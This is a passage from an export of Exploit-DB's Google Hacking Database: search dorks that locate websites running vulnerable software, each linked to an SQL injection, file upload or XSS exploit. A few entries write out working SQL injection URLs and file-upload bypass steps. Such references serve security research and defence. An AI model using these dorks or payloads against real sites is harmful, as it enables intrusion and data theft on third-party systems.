<id>4302</id>
<link>https://www.exploit-db.com/ghdb/4302</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Hello visitor from&quot; ext:asp</shortDescription>
<textualDescription>intext:&quot;Hello visitor from&quot; ext:asp
atawho - sonadam - antidote
details
https://monodram.net/2015/10/10/user-agent-xss-inj.html</textualDescription>
<query>intext:&quot;Hello visitor from&quot; ext:asp</query>
<querystring>https://www.google.com/search?q=intext:&quot;Hello visitor from&quot; ext:asp</querystring>
<edb></edb>
<date>2016-06-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>6747</id>
<link>https://www.exploit-db.com/ghdb/6747</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Incom CMS 2.0&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Incom CMS 2.0&quot;
# IncomCMS 2.0 - Insecure File Upload. CVE: CVE-2020-29597. https://www.exploit-db.com/exploits/49351
# Date: 5/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Incom CMS 2.0&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Incom CMS 2.0&quot;</querystring>
<edb></edb>
<date>2021-01-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1993</id>
<link>https://www.exploit-db.com/ghdb/1993</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;jPORTAL 2&quot; inurl:&quot;mailer.php&quot;</shortDescription>
<textualDescription>jPORTAL 2 mailer.php Remote SQL Injection Vulnerability - CVE: 2007-5974: https://www.exploit-db.com/exploits/4611</textualDescription>
<query>intext:&quot;jPORTAL 2&quot; inurl:&quot;mailer.php&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22jPORTAL+2%22++inurl:%22mailer.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/4611</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1654</id>
<link>https://www.exploit-db.com/ghdb/1654</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Kalimat news system v 1.0&quot;</shortDescription>
<textualDescription>kalimat new system v 1.0 (index.php) SQL Injection: https://www.exploit-db.com/exploits/11563</textualDescription>
<query>intext:&quot;Kalimat news system v 1.0&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Kalimat+news+system+v+1.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/11563</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1305</id>
<link>https://www.exploit-db.com/ghdb/1305</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;LinPHA Version&quot; intext:&quot;Have fun&quot;</shortDescription>
<textualDescription>this is for Linpha</textualDescription>
<query>intext:&quot;LinPHA Version&quot; intext:&quot;Have fun&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22LinPHA+Version%22+intext:%22Have+fun%22+&amp;start=20&amp;sa=N</querystring>
<edb></edb>
<date>2006-02-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>2963</id>
<link>https://www.exploit-db.com/ghdb/2963</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Marketing Web Design - Posicionamiento en Buscadores&quot;</shortDescription>
<textualDescription>Marketing Web Design Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12788</textualDescription>
<query>intext:&quot;Marketing Web Design - Posicionamiento en Buscadores&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Marketing+Web+Design+-+Posicionamiento+en+Buscadores%22</querystring>
<edb>https://www.exploit-db.com/exploits/12788</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3015</id>
<link>https://www.exploit-db.com/ghdb/3015</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Parlic Design&quot; inurl:id</shortDescription>
<textualDescription>parlic Design (SQL/XSS/HTML) Multiple Vulnerabilities: https://www.exploit-db.com/exploits/12767</textualDescription>
<query>intext:&quot;Parlic Design&quot; inurl:id</query>
<querystring>https://www.google.com/search?q=intext:%22Parlic+Design%22+inurl:id</querystring>
<edb>https://www.exploit-db.com/exploits/12767</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3298</id>
<link>https://www.exploit-db.com/ghdb/3298</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;phpbb - auction&quot; inurl:&quot;auction&quot;</shortDescription>
<textualDescription>Auction 1.3m (phpbb_root_path) Remote File Include - CVE: 2006-2245: https://www.exploit-db.com/exploits/1747</textualDescription>
<query>intext:&quot;phpbb - auction&quot; inurl:&quot;auction&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22phpbb+-+auction%22+inurl:%22auction%22</querystring>
<edb>https://www.exploit-db.com/exploits/1747</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1242</id>
<link>https://www.exploit-db.com/ghdb/1242</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;PhpGedView Version&quot; intext:&quot;final - index&quot; -inurl:demo</shortDescription>
<textualDescription>PHPGedView</textualDescription>
<query>intext:&quot;PhpGedView Version&quot; intext:&quot;final - index&quot; -inurl:demo</query>
<querystring>https://www.google.com/search?q=intext:%22PhpGedView+Version%22+intext:%22final+-+index%22+-inurl:demo&amp;start=30&amp;sa=N</querystring>
<edb></edb>
<date>2006-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>5693</id>
<link>https://www.exploit-db.com/ghdb/5693</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Please enable JavaScript in your browser before using Citrix Receiver.&quot; AND intext:www.citrix.com</shortDescription>
<textualDescription>Description: Search for Citrix Gateway servers that could potentially be
vulnerable to CVE-2019-19781
Author: Ahmad Al-Nounou
LinkdeIn: https://www.linkedin.com/in/ahmadalnounou/
</textualDescription>
<query>intext:&quot;Please enable JavaScript in your browser before using Citrix Receiver.&quot; AND intext:www.citrix.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;Please enable JavaScript in your browser before using Citrix Receiver.&quot; AND intext:www.citrix.com</querystring>
<edb></edb>
<date>2020-01-21</date>
<author>Ahmad Al-Nounou</author>
</entry>
<entry>
<id>5994</id>
<link>https://www.exploit-db.com/ghdb/5994</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Please Login&quot; inurl:&quot;/remote/login&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Please Login&quot; inurl:&quot;/remote/login&quot;
# FortiOS Leak file - Reading login/passwords in clear text. This dork is
linked to the following existing exploits:
https://www.exploit-db.com/exploits/47287
https://www.exploit-db.com/exploits/47288
# Date: 2/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Please Login&quot; inurl:&quot;/remote/login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Please Login&quot; inurl:&quot;/remote/login&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3190</id>
<link>https://www.exploit-db.com/ghdb/3190</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;pLink 2.07&quot;</shortDescription>
<textualDescription>pLink 2.07 (linkto.php id) Remote Blind SQL Injection - CVE: 2008-4357: https://www.exploit-db.com/exploits/6449</textualDescription>
<query>intext:&quot;pLink 2.07&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22pLink+2.07%22</querystring>
<edb>https://www.exploit-db.com/exploits/6449</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1832</id>
<link>https://www.exploit-db.com/ghdb/1832</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;powered and designed by Dow Group&quot;</shortDescription>
<textualDescription>Dow Group (new.php) SQL Injection: https://www.exploit-db.com/exploits/9491</textualDescription>
<query>intext:&quot;powered and designed by Dow Group&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22powered+and+designed+by+Dow+Group%22</querystring>
<edb>https://www.exploit-db.com/exploits/9491</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5184</id>
<link>https://www.exploit-db.com/ghdb/5184</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by 74cms v5.0.1&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Powered by 74cms v5.0.1&quot;
# Description: Google Dork to find the pages vulnerable to CVE-2019-10684
# Date: 04-16-2019
# Author: Rahul B Pallickal
# Contact: https://www.linkedin.com/in/rahulbpkl/
</textualDescription>
<query>intext:&quot;Powered by 74cms v5.0.1&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by 74cms v5.0.1&quot;</querystring>
<edb></edb>
<date>2019-04-16</date>
<author>Rahul B Pallickal</author>
</entry>
<entry>
<id>1690</id>
<link>https://www.exploit-db.com/ghdb/1690</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered By : Yamamah Version 1.00&quot;</shortDescription>
<textualDescription>Yamamah 1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13849</textualDescription>
<query>intext:&quot;Powered By : Yamamah Version 1.00&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+By+:+Yamamah+Version+1.00%22</querystring>
<edb>https://www.exploit-db.com/exploits/13849</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1906</id>
<link>https://www.exploit-db.com/ghdb/1906</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Arcade Builder&quot;</shortDescription>
<textualDescription>ArcadeBuilder Game Portal Manager 1.7 Remote SQL Injection Vuln - CVE: 2007-3521: https://www.exploit-db.com/exploits/4133</textualDescription>
<query>intext:&quot;Powered by Arcade Builder&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+Arcade+Builder%22</querystring>
<edb>https://www.exploit-db.com/exploits/4133</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3211</id>
<link>https://www.exploit-db.com/ghdb/3211</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Atomic Photo Album 1.1.0pre4&quot;</shortDescription>
<textualDescription>Atomic Photo Album 1.1.0pre4 Blind SQL Injection - CVE: 2008-4335: https://www.exploit-db.com/exploits/6574</textualDescription>
<query>intext:&quot;Powered by Atomic Photo Album 1.1.0pre4&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+Atomic+Photo+Album+1.1.0pre4%22</querystring>
<edb>https://www.exploit-db.com/exploits/6574</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1789</id>
<link>https://www.exploit-db.com/ghdb/1789</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered By Azaronline.com&quot;</shortDescription>
<textualDescription>Azaronline Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15391</textualDescription>
<query>intext:&quot;Powered By Azaronline.com&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+By+Azaronline.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/15391</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2221</id>
<link>https://www.exploit-db.com/ghdb/2221</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by CLscript.com&quot;</shortDescription>
<textualDescription>CLScript.com Classifieds Software SQL Injection Vunerability - CVE: 2010-1660: https://www.exploit-db.com/exploits/12423</textualDescription>
<query>intext:&quot;Powered by CLscript.com&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=intext:%22Powered+by+CLscript.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/12423</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2765</id>
<link>https://www.exploit-db.com/ghdb/2765</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Community CMS&quot;</shortDescription>
<textualDescription>Community CMS 0.5 Multiple SQL Injection Vulnerabilities - CVE: 2009-4794: https://www.exploit-db.com/exploits/8323</textualDescription>
<query>intext:&quot;Powered by Community CMS&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+Community+CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/8323</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1231</id>
<link>https://www.exploit-db.com/ghdb/1231</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by CubeCart 3.0.6&quot; intitle:&quot;Powered by CubeCart&quot;</shortDescription>
<textualDescription>CubeCart is an eCommerce script written with PHP &amp; MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398Moderator note: &quot;Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke&quot;</textualDescription>
<query>intext:&quot;Powered by CubeCart 3.0.6&quot; intitle:&quot;Powered by CubeCart&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+by+CubeCart+3.0.6%22+intitle%3A%22Powered+by+CubeCart%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2005-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>1243</id>
<link>https://www.exploit-db.com/ghdb/1243</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by DEV web management system&quot; -dev-wms.sourceforge.net -demo</shortDescription>
<textualDescription>DEV cms</textualDescription>
<query>intext:&quot;Powered by DEV web management system&quot; -dev-wms.sourceforge.net -demo</query>
<querystring>https://www.google.com/search?hl=it&amp;q=intext%3A%22Powered+by+DEV+web+management+system%22+-dev-wms.sourceforge.net+-demo&amp;btnG=Cerca&amp;lr=</querystring>
<edb></edb>
<date>2006-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>3675</id>
<link>https://www.exploit-db.com/ghdb/3675</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by DZOIC Handshakes Professional&quot;</shortDescription>
<textualDescription>Author: IR-Security -Team
SQL injection: http://server/administrator/index.php?section=manage_members&amp;action=edit_photo&amp;pho_id=-100001 union
all select 1,version()--</textualDescription>
<query>intext:&quot;Powered by DZOIC Handshakes Professional&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by DZOIC Handshakes Professional&quot;</querystring>
<edb></edb>
<date>2011-01-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>2658</id>
<link>https://www.exploit-db.com/ghdb/2658</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by eDocStore&quot;</shortDescription>
<textualDescription>eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability - CVE: 2007-3452: https://www.exploit-db.com/exploits/4108</textualDescription>
<query>intext:&quot;Powered by eDocStore&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+eDocStore%22</querystring>
<edb>https://www.exploit-db.com/exploits/4108</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1672</id>
<link>https://www.exploit-db.com/ghdb/1672</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by eStore v1.0.2&quot;</shortDescription>
<textualDescription>eStore v1.0.2 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10784</textualDescription>
<query>intext:&quot;Powered by eStore v1.0.2&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+eStore+v1.0.2%22</querystring>
<edb>https://www.exploit-db.com/exploits/10784</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3695</id>
<link>https://www.exploit-db.com/ghdb/3695</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by EZPub&quot;</shortDescription>
<textualDescription>SQL Injection: https://www.exploit-db.com/exploits/16941</textualDescription>
<query>intext:&quot;Powered by EZPub&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by EZPub&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/16941</edb>
<date>2011-03-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>1605</id>
<link>https://www.exploit-db.com/ghdb/1605</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Firebrand Technologies&quot;</shortDescription>
<textualDescription>CMS Firebrand Tec Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/12378</textualDescription>
<query>intext:&quot;Powered by Firebrand Technologies&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+Firebrand+Technologies%22</querystring>
<edb>https://www.exploit-db.com/exploits/12378</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1009</id>
<link>https://www.exploit-db.com/ghdb/1009</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by flatnuke-2.5.3&quot; +&quot;Get RSS News&quot; -demo</shortDescription>
<textualDescription>Description of VulnerabilitiesMultiple vulnerabilities in FlatNuke have been reported, which can be exploited by remote users to trigger denial of service conditions, execute arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose arbitrary images and system information.If the &quot;/flatnuke/foot_news.php&quot; script is accessed directly a while() call is made that enters an infinite loop, leading to full CPU utilisation.[..]User-supplied input passed to the &quot;image&quot; parameter in the &quot;thumb.php&quot; script is not correctly validated. This can be exploited to disclose arbitrary images from external and local resources via directory traversal attacks, or to disclose the installation path.It is also possible to disclose the system path by accessing certain scripts directly or specially formed parameters.</textualDescription>
<query>intext:&quot;Powered by flatnuke-2.5.3&quot; +&quot;Get RSS News&quot; -demo</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+by+flatnuke-2.5.3%22+%2B%22Get+RSS+News%22+-demo</querystring>
<edb></edb>
<date>2005-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3707</id>
<link>https://www.exploit-db.com/ghdb/3707</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by FXRecruiter&quot;</shortDescription>
<textualDescription>Submitter: Ashiyane Digital Security Team
Arbitrary File Upload: You must Register at site, Then in &quot;Upload CV Field&quot; Select and Upload Your File, then Using &quot;Live Http Header&quot; Change ur File Format To Etc Uploaded path: http://127.0.0.1/fxmodules/resumes/[Your File]</textualDescription>
<query>intext:&quot;Powered by FXRecruiter&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+by+FXRecruiter%22</querystring>
<edb></edb>
<date>2011-03-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>1315</id>
<link>https://www.exploit-db.com/ghdb/1315</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;powered by gcards&quot; -ihackstuff -exploit</shortDescription>
<textualDescription>this is for gcards</textualDescription>
<query>intext:&quot;powered by gcards&quot; -ihackstuff -exploit</query>
<querystring>https://www.google.com/search?num=100&amp;hl=it&amp;q=intext%3A%22powered+by+gcards%22+-ihackstuff+-exploit&amp;btnG=Cerca&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>1311</id>
<link>https://www.exploit-db.com/ghdb/1311</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered By Geeklog&quot; -geeklog.net</shortDescription>
<textualDescription>dork: intext:&quot;Powered By Geeklog&quot; -geeklog.net this is for the vulnerability discovered by GulfTech research, related stuff: (*) http://www.gulftech.org/?node=research&amp;article_id=00102-02192006 http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=geeklog&amp;type=archives&amp;%5Bsearch%5D.x=0&amp;%5Bsearch%5D.y=0 exploit for (*) : http://retrogod.altervista.org/geeklog_1_4_xpl_php_.html (php) http://retrogod.altervista.org/geeklog_1_4_xpl_perl_.html (perl...mphhh)</textualDescription>
<query>intext:&quot;Powered By Geeklog&quot; -geeklog.net</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+By+Geeklog%22+-geeklog.net+&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3704</id>
<link>https://www.exploit-db.com/ghdb/3704</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Inventory Mojo Software.&quot;</shortDescription>
<textualDescription>Submitter: p0pc0rn
SQL Injection (categoria.asp, producto.asp, srubro.asp, marca.asp, buscar.asp, Login.asp, NewUser.asp, do_addToNewsletter.asp)
---
http://site.com/categoria.asp?CT=6' and '1'='1 TRUE http://site.com/categoria.asp?CT=6' and '1'='0 FALSE</textualDescription>
<query>intext:&quot;Powered by Inventory Mojo Software.&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+by+Inventory+Mojo+Software.%22</querystring>
<edb></edb>
<date>2011-03-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>2068</id>
<link>https://www.exploit-db.com/ghdb/2068</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;powered by itaco group&quot;</shortDescription>
<textualDescription>ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11012</textualDescription>
<query>intext:&quot;powered by itaco group&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;powered+by+itaco+group&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/11012</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3374</id>
<link>https://www.exploit-db.com/ghdb/3374</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Lore 1.5.6&quot;</shortDescription>
<textualDescription>re 1.5.6 (article.php) Blind SQL Injection: https://www.exploit-db.com/exploits/7896</textualDescription>
<query>intext:&quot;Powered by Lore 1.5.6&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+Lore+1.5.6%22</querystring>
<edb>https://www.exploit-db.com/exploits/7896</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2264</id>
<link>https://www.exploit-db.com/ghdb/2264</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Max.Blog&quot;</shortDescription>
<textualDescription>Max.Blog 1.0.6 (show_post.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7885</textualDescription>
<query>intext:&quot;Powered by Max.Blog&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=intext:%22Powered+by+Max.Blog%22</querystring>
<edb>https://www.exploit-db.com/exploits/7885</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2339</id>
<link>https://www.exploit-db.com/ghdb/2339</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Max.Blog&quot;</shortDescription>
<textualDescription>Max.Blog 1.0.6 (submit_post.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7898</textualDescription>
<query>intext:&quot;Powered by Max.Blog&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+Max.Blog%22</querystring>
<edb>https://www.exploit-db.com/exploits/7898</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2750</id>
<link>https://www.exploit-db.com/ghdb/2750</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Max.Blog&quot;</shortDescription>
<textualDescription>Max.Blog 1.0.6 (offline_auth.php) Offline Authentication Bypass - CVE: 2009-0409: https://www.exploit-db.com/exploits/7899</textualDescription>
<query>intext:&quot;Powered by Max.Blog&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+Max.Blog%22</querystring>
<edb>https://www.exploit-db.com/exploits/7899</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1842</id>
<link>https://www.exploit-db.com/ghdb/1842</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;powered by Milonic&quot; inurl:viewnews.php?id=</shortDescription>
<textualDescription>Milonic News (viewnews) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11031</textualDescription>
<query>intext:&quot;powered by Milonic&quot; inurl:viewnews.php?id=</query>
<querystring>https://www.google.com/search?q=intext:%22powered+by+Milonic%22+inurl:viewnews.php%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/11031</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3702</id>
<link>https://www.exploit-db.com/ghdb/3702</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by OnePlug CMS&quot;</shortDescription>
<textualDescription>Sumitter: p0pc0rn
SQL Injection: http://site.com/category_list.asp?Category_ID=1 union select 0 from test.a</textualDescription>
<query>intext:&quot;Powered by OnePlug CMS&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered%20by%20OnePlug%20CMS%22</querystring>
<edb></edb>
<date>2011-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>4148</id>
<link>https://www.exploit-db.com/ghdb/4148</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered By OpenCart&quot; -site:opencart.com -inurl:&quot;Powered By OpenCart&quot; -intitle:&quot;OpenCart&quot; -intitle:&quot;powered by&quot;</shortDescription>
<textualDescription>Find Open Carts for Remote File Upload vulnerability.
Decoy</textualDescription>
<query>intext:&quot;Powered By OpenCart&quot; -site:opencart.com -inurl:&quot;Powered By OpenCart&quot; -intitle:&quot;OpenCart&quot; -intitle:&quot;powered by&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered By OpenCart&quot; -site:opencart.com -inurl:&quot;Powered By OpenCart&quot; -intitle:&quot;OpenCart&quot; -intitle:&quot;powered by&quot;</querystring>
<edb></edb>
<date>2015-12-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>3377</id>
<link>https://www.exploit-db.com/ghdb/3377</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Pc4Uploader v9.0&quot;</shortDescription>
<textualDescription>Pc4Uploader 9.0 Remote Blind SQL Injection Vulnerability - CVE: 2009-1742: https://www.exploit-db.com/exploits/8709</textualDescription>
<query>intext:&quot;Powered by Pc4Uploader v9.0&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+Pc4Uploader++v9.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/8709</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1370</id>
<link>https://www.exploit-db.com/ghdb/1370</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by PCPIN.com&quot; -site:pcpin.com -ihackstuff -&quot;works with&quot; -findlaw</shortDescription>
<textualDescription>this is for PCPIN Chat SQL injection/login bypass and arbitrary local inclusion references:http://retrogod.altervista.org/pcpin_504_xpl.htmlhttp://secunia.com/advisories/19708/</textualDescription>
<query>intext:&quot;Powered by PCPIN.com&quot; -site:pcpin.com -ihackstuff -&quot;works with&quot; -findlaw</query>
<querystring>https://www.google.com/search?num=100&amp;q=intext%3A%22Powered+by+PCPIN.com%22+-site%3Apcpin.com+-ihackstuff+-%22works+with%22+-findlaw&amp;filter=0</querystring>
<edb></edb>
<date>2006-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>934</id>
<link>https://www.exploit-db.com/ghdb/934</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by phpBB 2.0.13&quot; inurl:&quot;cal_view_month.php&quot;|inurl:&quot;downloads.php&quot;</shortDescription>
<textualDescription>phpBB 2.0.13 with installed Calendar Pro MOD are vulnerable to SQL injection attacks. An attacker can download the MD5 hashes from the account databse without authorization.</textualDescription>
<query>intext:&quot;Powered by phpBB 2.0.13&quot; inurl:&quot;cal_view_month.php&quot;|inurl:&quot;downloads.php&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+by+phpBB+2.0.13%22+inurl%3A%22cal_view_month.php%22%7Cinurl%3A%22downloads.php%22</querystring>
<edb></edb>
<date>2005-04-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>1630</id>
<link>https://www.exploit-db.com/ghdb/1630</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by PHPCityPortal.com&quot;</shortDescription>
<textualDescription>PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2009-4870: https://www.exploit-db.com/exploits/9395</textualDescription>
<query>intext:&quot;Powered by PHPCityPortal.com&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+PHPCityPortal.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/9395</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1533</id>
<link>https://www.exploit-db.com/ghdb/1533</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by phpFastNews&quot;</shortDescription>
<textualDescription>phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability - CVE: 2008-4622: https://www.exploit-db.com/exploits/6779</textualDescription>
<query>intext:&quot;Powered by phpFastNews&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+phpFastNews%22</querystring>
<edb>https://www.exploit-db.com/exploits/6779</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6587</id>
<link>https://www.exploit-db.com/ghdb/6587</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Piwigo&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Powered by Piwigo&quot;
# CVE-2020-9467. Piwigo 2.10.1 - Cross Site Scripting.
https://www.exploit-db.com/exploits/48814
